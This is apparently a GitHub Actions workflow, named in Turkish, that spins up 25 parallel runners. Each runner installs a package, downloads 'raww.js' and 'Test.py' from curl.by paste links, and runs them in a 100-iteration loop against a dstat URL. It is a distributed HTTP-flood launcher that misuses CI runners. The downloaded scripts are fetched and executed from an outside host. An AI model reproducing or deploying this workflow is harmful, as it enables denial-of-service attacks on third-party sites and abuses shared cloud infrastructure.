name: Ubuntu VDS 50 saniye zeus

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 25
      matrix:
        instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25]


    steps:
      - name: OK !
        run: |
          pip install git+https://github.com/QuantumLLC/Archer
          wget https://curl.by/eoors/raww.js
          wget https://curl.by/4W4K-/Test.py
          chmod +x raww.js
          chmod +x Test.py
          PIDS=()
          for i in {1..100}; do
            timeout 100 python3 Test.py https://dstat.hexbear.xyz/xd && node raww.js https://dstat.hexbear.xyz/xd 100
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 100
        
      - name: OK !
        run: sudo reboot
